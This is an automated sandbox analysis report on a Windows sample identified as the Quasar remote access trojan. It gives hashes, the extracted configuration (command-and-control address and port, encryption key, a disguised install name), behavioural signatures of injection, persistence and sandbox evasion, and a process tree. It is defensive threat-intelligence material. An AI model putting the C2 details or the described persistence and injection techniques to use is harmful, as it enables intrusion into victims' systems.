Analysis
max time kernel: 1800s
max time network: 1592s
platform: windows10-1703_x64
resource: win10-20240404-en
resource tags: arch:x64, arch:x86, image:win10-20240404-en, locale:en-us, os:windows10-1703-x64, system
submitted: 21-04-2024 17:11
Behavioral task behavioral1: sample Sexy.exe, resource win10-20240404-en
Behavioral task behavioral2: sample Sexy.exe, resource win10v2004-20240412-en
General
Target: Sexy.exe
Size: 409KB
MD5: 4c5faec89139e079202a5208d49ed5a0
SHA1: f26bf551e191af0dd01b5d39ae0c8489d94a877e
SHA256: bbecd1e502693965f493ecb6a611dd86dc71b4bcb8471cf4c459d0b44e9f6378
SHA512: 5d31a95a76a2d17967f685b47823682f8301164ee9386f267f2ce28b866429dfb48aa7ef7cb21a7ab8b732286fb99eee989d10e5040ea69a361ba83b0b22ec64
SSDEEP: 12288:iBwz9kOUJIOSQoxdKIT00N2f3DPcCYDVouW5:i+JLOsVRi3YCYg
Malware Config
Extracted
quasar
3.1.5
SLAVE
147.185.221.19:33587
$Sxr-zpFqsQjJJh3miBvVnu
encryption_key: LxGS9iJRjIMm1rV0MEzT
install_name: BiosUpdX64YDPS.exe
log_directory: $sxr
reconnect_delay: 3000
startup_key: $sxr-mtsha
subdirectory: Windows
Signatures
-
Quasar payload (2 IoCs)
Processes:
resource | yara_rule
behavioral1/memory/4228-0-0x0000000000880000-0x00000000008EC000-memory.dmp | family_quasar
C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64YDPS.exe | family_quasar
Suspicious use of NtCreateProcessExOtherParentProcess (2 IoCs)
Processes:
description | pid | process | target process
PID 3708 created 3668 | 3708 | WerFault.exe | DllHost.exe
PID 1084 created 4612 | 1084 | WerFault.exe | DllHost.exe
Suspicious use of NtCreateUserProcessOtherParentProcess (4 IoCs)
Processes:
description | pid | process | target process
PID 216 created 588 | 216 | powershell.EXE | winlogon.exe
PID 3180 created 588 | 3180 | powershell.EXE | winlogon.exe
PID 4356 created 3668 | 4356 | svchost.exe | DllHost.exe
PID 4356 created 4612 | 4356 | svchost.exe | DllHost.exe
Downloads MZ/PE file
-
Executes dropped EXE (3 IoCs)
Processes:
pid | process
428 | BiosUpdX64YDPS.exe
1488 | Install.exe
4348 | Install.exe
Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 3 IoCs)
Processes:
flow | ioc
5 | raw.githubusercontent.com
6 | raw.githubusercontent.com
16 | raw.githubusercontent.com
Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow | ioc
1 | ip-api.com
Drops file in System32 directory (12 IoCs)
Processes:
description | ioc | process
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\$77svc64 | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\$77BiosUpdX64YDPS.exe | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8A7891822FCFF127E4EADADE9757112B | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | svchost.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | powershell.EXE
Suspicious use of SetThreadContext (2 IoCs)
Processes:
description | pid | process | target process
PID 216 set thread context of 2960 | 216 | powershell.EXE | dllhost.exe
PID 3180 set thread context of 2440 | 3180 | powershell.EXE | dllhost.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) (3 TTPs, 8 IoCs)
SCSI information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | dwm.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_QEMU&PROD_HARDDISK\4&215468A5&0&000000 | dwm.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags | dwm.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | dwm.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | dwm.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_QEMU&PROD_HARDDISK\4&215468A5&0&000000 | dwm.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags | dwm.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | dwm.exe
Creates scheduled task(s) (1 TTPs, 4 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid | process
3532 | schtasks.exe
4708 | SCHTASKS.exe
4216 | schtasks.exe
208 | SCHTASKS.exe
Modifies data under HKEY_USERS (64 IoCs)
Processes:
description | ioc | process
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.EXE
Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.EXE
Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.EXE
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.EXE
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses (64 IoCs)
Processes (consecutive hits, in report order):
pid | process | hits
216 | powershell.EXE | 4
2960 | dllhost.exe | 6
3180 | powershell.EXE | 1
2960 | dllhost.exe | 4
3180 | powershell.EXE | 1
2960 | dllhost.exe | 4
3180 | powershell.EXE | 1
2960 | dllhost.exe | 6
3180 | powershell.EXE | 1
2960 | dllhost.exe | 8
3180 | powershell.EXE | 1
2960 | dllhost.exe | 2
2440 | dllhost.exe | 25
Suspicious use of AdjustPrivilegeToken (37 IoCs)
Processes:
description | pid | process
Token: SeDebugPrivilege | 4228 | Sexy.exe
Token: SeDebugPrivilege | 428 | BiosUpdX64YDPS.exe
Token: SeDebugPrivilege | 216 | powershell.EXE
Token: SeDebugPrivilege | 216 | powershell.EXE
Token: SeDebugPrivilege | 2960 | dllhost.exe
Token: SeCreateGlobalPrivilege | 2400 | dwm.exe
Token: SeChangeNotifyPrivilege | 2400 | dwm.exe
Token: 33 | 2400 | dwm.exe
Token: SeIncBasePriorityPrivilege | 2400 | dwm.exe
Token: SeCreateGlobalPrivilege | 3272 | dwm.exe
Token: SeChangeNotifyPrivilege | 3272 | dwm.exe
Token: 33 | 3272 | dwm.exe
Token: SeIncBasePriorityPrivilege | 3272 | dwm.exe
Token: SeShutdownPrivilege | 3368 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3368 | Explorer.EXE
Token: SeShutdownPrivilege | 3368 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3368 | Explorer.EXE
Token: SeDebugPrivilege | 3180 | powershell.EXE
Token: SeDebugPrivilege | 3180 | powershell.EXE
Token: SeDebugPrivilege | 2440 | dllhost.exe
Token: SeShutdownPrivilege | 3368 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3368 | Explorer.EXE
Token: SeShutdownPrivilege | 3368 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3368 | Explorer.EXE
Token: SeShutdownPrivilege | 3368 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3368 | Explorer.EXE
Token: SeAuditPrivilege | 2352 | svchost.exe
Token: SeShutdownPrivilege | 3368 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3368 | Explorer.EXE
Token: SeAuditPrivilege | 2352 | svchost.exe
Token: SeShutdownPrivilege | 3368 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3368 | Explorer.EXE
Token: SeShutdownPrivilege | 3368 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3368 | Explorer.EXE
Token: SeAuditPrivilege | 2352 | svchost.exe
Token: SeShutdownPrivilege | 3368 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3368 | Explorer.EXE
Suspicious use of FindShellTrayWindow (8 IoCs)
Processes:
pid | process
2400 | dwm.exe
2400 | dwm.exe
3272 | dwm.exe
3272 | dwm.exe
3272 | dwm.exe
3272 | dwm.exe
3272 | dwm.exe
3272 | dwm.exe
Suspicious use of SetWindowsHookEx (1 IoCs)
Processes:
pid | process
428 | BiosUpdX64YDPS.exe
Suspicious use of UnmapMainImage (1 IoCs)
Processes:
pid | process
3368 | Explorer.EXE
Suspicious use of WriteProcessMemory (64 IoCs)
Processes:
description | pid | process | target process
PID 4228 wrote to memory of 3532 | 4228 | Sexy.exe | schtasks.exe
PID 4228 wrote to memory of 3532 | 4228 | Sexy.exe | schtasks.exe
PID 4228 wrote to memory of 3532 | 4228 | Sexy.exe | schtasks.exe
PID 4228 wrote to memory of 428 | 4228 | Sexy.exe | BiosUpdX64YDPS.exe
PID 4228 wrote to memory of 428 | 4228 | Sexy.exe | BiosUpdX64YDPS.exe
PID 4228 wrote to memory of 428 | 4228 | Sexy.exe | BiosUpdX64YDPS.exe
PID 4228 wrote to memory of 1488 | 4228 | Sexy.exe | Install.exe
PID 4228 wrote to memory of 1488 | 4228 | Sexy.exe | Install.exe
PID 4228 wrote to memory of 1488 | 4228 | Sexy.exe | Install.exe
PID 4228 wrote to memory of 4708 | 4228 | Sexy.exe | SCHTASKS.exe
PID 4228 wrote to memory of 4708 | 4228 | Sexy.exe | SCHTASKS.exe
PID 4228 wrote to memory of 4708 | 4228 | Sexy.exe | SCHTASKS.exe
PID 428 wrote to memory of 4216 | 428 | BiosUpdX64YDPS.exe | schtasks.exe
PID 428 wrote to memory of 4216 | 428 | BiosUpdX64YDPS.exe | schtasks.exe
PID 428 wrote to memory of 4216 | 428 | BiosUpdX64YDPS.exe | schtasks.exe
PID 216 wrote to memory of 2960 | 216 | powershell.EXE | dllhost.exe
PID 216 wrote to memory of 2960 | 216 | powershell.EXE | dllhost.exe
PID 216 wrote to memory of 2960 | 216 | powershell.EXE | dllhost.exe
PID 216 wrote to memory of 2960 | 216 | powershell.EXE | dllhost.exe
PID 216 wrote to memory of 2960 | 216 | powershell.EXE | dllhost.exe
PID 216 wrote to memory of 2960 | 216 | powershell.EXE | dllhost.exe
PID 216 wrote to memory of 2960 | 216 | powershell.EXE | dllhost.exe
PID 216 wrote to memory of 2960 | 216 | powershell.EXE | dllhost.exe
PID 2960 wrote to memory of 588 | 2960 | dllhost.exe | winlogon.exe
PID 2960 wrote to memory of 648 | 2960 | dllhost.exe | lsass.exe
PID 2960 wrote to memory of 732 | 2960 | dllhost.exe | svchost.exe
PID 2960 wrote to memory of 916 | 2960 | dllhost.exe | svchost.exe
PID 2960 wrote to memory of 1000 | 2960 | dllhost.exe | dwm.exe
PID 2960 wrote to memory of 368 | 2960 | dllhost.exe | svchost.exe
PID 2960 wrote to memory of 364 | 2960 | dllhost.exe | svchost.exe
PID 2960 wrote to memory of 696 | 2960 | dllhost.exe | svchost.exe
PID 428 wrote to memory of 4504 | 428 | BiosUpdX64YDPS.exe | schtasks.exe
PID 2960 wrote to memory of 1056 | 2960 | dllhost.exe | svchost.exe
PID 648 wrote to memory of 2600 | 648 | lsass.exe | sysmon.exe
PID 428 wrote to memory of 4504 | 428 | BiosUpdX64YDPS.exe | schtasks.exe
PID 428 wrote to memory of 4504 | 428 | BiosUpdX64YDPS.exe | schtasks.exe
PID 648 wrote to memory of 2600 | 648 | lsass.exe | sysmon.exe
PID 2960 wrote to memory of 1140 | 2960 | dllhost.exe | svchost.exe
PID 2960 wrote to memory of 1172 | 2960 | dllhost.exe | svchost.exe
PID 648 wrote to memory of 2600 | 648 | lsass.exe | sysmon.exe
PID 428 wrote to memory of 2304 | 428 | BiosUpdX64YDPS.exe | cmd.exe
PID 428 wrote to memory of 2304 | 428 | BiosUpdX64YDPS.exe | cmd.exe
PID 428 wrote to memory of 2304 | 428 | BiosUpdX64YDPS.exe | cmd.exe
PID 648 wrote to memory of 2600 | 648 | lsass.exe | sysmon.exe
PID 2960 wrote to memory of 1264 | 2960 | dllhost.exe | svchost.exe
PID 648 wrote to memory of 2600 | 648 | lsass.exe | sysmon.exe
PID 2960 wrote to memory of 1272 | 2960 | dllhost.exe | svchost.exe
PID 2960 wrote to memory of 1280 | 2960 | dllhost.exe | svchost.exe
PID 648 wrote to memory of 2600 | 648 | lsass.exe | sysmon.exe
PID 2960 wrote to memory of 1368 | 2960 | dllhost.exe | svchost.exe
PID 2960 wrote to memory of 1420 | 2960 | dllhost.exe | svchost.exe
PID 2960 wrote to memory of 1444 | 2960 | dllhost.exe | svchost.exe
PID 648 wrote to memory of 428 | 648 | lsass.exe | BiosUpdX64YDPS.exe
PID 648 wrote to memory of 428 | 648 | lsass.exe | BiosUpdX64YDPS.exe
PID 648 wrote to memory of 428 | 648 | lsass.exe | BiosUpdX64YDPS.exe
PID 648 wrote to memory of 428 | 648 | lsass.exe | BiosUpdX64YDPS.exe
PID 648 wrote to memory of 428 | 648 | lsass.exe | BiosUpdX64YDPS.exe
PID 648 wrote to memory of 428 | 648 | lsass.exe | BiosUpdX64YDPS.exe
PID 648 wrote to memory of 428 | 648 | lsass.exe | BiosUpdX64YDPS.exe
PID 648 wrote to memory of 428 | 648 | lsass.exe | BiosUpdX64YDPS.exe
PID 648 wrote to memory of 428 | 648 | lsass.exe | BiosUpdX64YDPS.exe
PID 648 wrote to memory of 428 | 648 | lsass.exe | BiosUpdX64YDPS.exe
PID 2960 wrote to memory of 1540 | 2960 | dllhost.exe | svchost.exe
PID 2960 wrote to memory of 1564 | 2960 | dllhost.exe | svchost.exe
Processes
-
C:\Windows\system32\winlogon.exe (depth 1)
Command line: winlogon.exe
-
C:\Windows\system32\dwm.exe (depth 2)
Command line: "dwm.exe"
-
C:\Windows\System32\dllhost.exe (depth 2)
Command line: C:\Windows\System32\dllhost.exe /Processid:{a1d70545-8ee1-43d4-9df5-7e103b974382}
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\dwm.exe (depth 2)
Command line: "dwm.exe"
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\dwm.exe (depth 2)
Command line: "dwm.exe"
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\System32\dllhost.exe (depth 2)
Command line: C:\Windows\System32\dllhost.exe /Processid:{a5599c07-9b1f-4d28-b51e-70ab5e545dc7}
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\lsass.exe (depth 1)
Command line: C:\Windows\system32\lsass.exe
- Suspicious use of WriteProcessMemory
-
c:\windows\system32\svchost.exe (depth 1)
Command line: c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
-
c:\windows\system32\svchost.exe (depth 1)
Command line: c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
-
c:\windows\system32\svchost.exe (depth 1)
Command line: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
-
c:\windows\system32\svchost.exe (depth 1)
Command line: c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
-
c:\windows\system32\svchost.exe (depth 1)
Command line: c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
-
c:\windows\system32\svchost.exe (depth 1)
Command line: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
- Drops file in System32 directory
-
c:\windows\system32\svchost.exe (depth 1)
Command line: c:\windows\system32\svchost.exe -k netsvcs -s Schedule
- Drops file in System32 directory
-
c:\windows\system32\taskhostw.exe (depth 2)
Command line: taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE (depth 2)
Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "..." (the quoted argument is a long obfuscated inline script; omitted here)
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE (depth 2)
Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "..." (the quoted argument is a long obfuscated inline script; omitted here)
l)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe (depth 3)
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
-
c:\windows\system32\svchost.exe (depth 1)
c:\windows\system32\svchost.exe -k localservice -s nsi
-
c:\windows\system32\svchost.exe (depth 1)
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
-
c:\windows\system32\svchost.exe (depth 1)
c:\windows\system32\svchost.exe -k localservice -s EventSystem
-
c:\windows\system32\svchost.exe (depth 1)
c:\windows\system32\svchost.exe -k netsvcs -s Themes
-
c:\windows\system32\svchost.exe (depth 1)
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
-
c:\windows\system32\svchost.exe (depth 1)
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
-
c:\windows\system32\sihost.exe (depth 2)
sihost.exe
-
c:\windows\system32\svchost.exe (depth 1)
c:\windows\system32\svchost.exe -k netsvcs -s SENS
-
c:\windows\system32\svchost.exe (depth 1)
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
-
c:\windows\system32\svchost.exe (depth 1)
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
-
c:\windows\system32\svchost.exe (depth 1)
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
-
C:\Windows\System32\svchost.exe (depth 1)
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
-
c:\windows\system32\svchost.exe (depth 1)
c:\windows\system32\svchost.exe -k localservice -s netprofm
-
C:\Windows\System32\svchost.exe (depth 1)
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
-
C:\Windows\system32\svchost.exe (depth 1)
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
-
c:\windows\system32\svchost.exe (depth 1)
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
-
c:\windows\system32\svchost.exe (depth 1)
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
-
c:\windows\system32\svchost.exe (depth 1)
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
-
C:\Windows\System32\spoolsv.exe (depth 1)
C:\Windows\System32\spoolsv.exe
-
c:\windows\system32\svchost.exe (depth 1)
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
-
c:\windows\system32\svchost.exe (depth 1)
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
- Suspicious use of AdjustPrivilegeToken
-
c:\windows\system32\svchost.exe (depth 1)
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
-
c:\windows\system32\svchost.exe (depth 1)
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
-
c:\windows\system32\svchost.exe (depth 1)
c:\windows\system32\svchost.exe -k netsvcs -s Browser
-
c:\windows\system32\svchost.exe (depth 1)
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
- Drops file in System32 directory
-
C:\Windows\sysmon.exe (depth 1)
C:\Windows\sysmon.exe
-
c:\windows\system32\svchost.exe (depth 1)
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
-
c:\windows\system32\svchost.exe (depth 1)
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
-
c:\windows\system32\svchost.exe (depth 1)
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
-
C:\Windows\system32\wbem\unsecapp.exe (depth 1)
C:\Windows\system32\wbem\unsecapp.exe -Embedding
-
c:\windows\system32\svchost.exe (depth 1)
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
-
c:\windows\system32\svchost.exe (depth 1)
c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
-
